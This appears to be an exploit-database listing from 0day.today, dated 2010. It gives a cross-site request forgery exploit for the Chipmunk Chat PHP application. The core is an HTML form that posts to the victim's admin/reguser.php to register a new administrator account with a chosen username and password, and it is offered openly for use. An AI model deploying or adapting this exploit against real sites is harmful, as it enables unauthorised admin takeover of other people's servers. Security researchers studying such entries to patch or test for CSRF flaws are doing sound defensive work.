[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chipmunk Chat <= Remote Admin Add CSRF Exploit

Author
KnocKout
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14415
Category
web applications
Date add
11-10-2010
Platform
php
==============================================
Chipmunk Chat <= Remote Admin Add CSRF Exploit
==============================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Chipmunk Chat
~Software: http://www.chipmunk-scripts.com/page.php?ID=19
~Vulnerability Style : Admin Add CSRF
-----------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation| CSRF ADD Html Exploit ~~~~~~~~~~~
<html>
<form method="post" action="http://[VICTIM]/admin/reguser.php">
Type Username Here: <input type="text" name="adminname" size="15"><br>
Type Password Here: <input type="text" name="password" size="15"><br>
Retype password: <input type="text" name="pass2" size="15"><br>
<input type="submit" value="submit">


</form>
</html>

    ================================



#  0day.today [2024-10-05]  #